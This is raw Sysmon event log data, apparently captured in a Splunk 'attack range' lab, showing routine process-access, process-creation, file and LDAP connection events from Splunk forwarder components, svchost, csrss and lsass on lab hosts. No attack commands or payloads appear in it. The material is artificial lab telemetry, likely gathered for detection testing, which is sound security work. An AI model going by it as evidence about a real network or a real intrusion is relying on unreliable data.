10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-123D-6216-7004-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-123D-6216-7004-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.346{4F8D34B0-123D-6216-7004-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000289294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:48.771{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53522-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:48.771{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53522-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:50.751{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6FD8474973E820678C22CE037625BA8,SHA256=2686F24E0EE1453A334B5C748775A9494EA0B5915426D15EFE082C568F10D195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:50.345{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DFB3FD8432FFB80D3B14BB4D5DC9F951,SHA256=B4B68E4068D16E89FC0BB7E4398774AAFED3CA06C37F3959616C8B92880D0044,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:50.111{4F8D34B0-123D-6216-7104-000000003902}31363900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:51.768{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F35ECAB188703CE56C43035DDC8A371,SHA256=3377492A0611A843DA55F22B2EF6864263A14BCE38C5FE4350FDBCEA1AE5DD81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-123F-6216-7204-000000003902}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-123F-6216-7204-000000003902}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.392{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-123F-6216-7204-000000003902}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:51.393{4F8D34B0-123F-6216-7204-000000003902}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 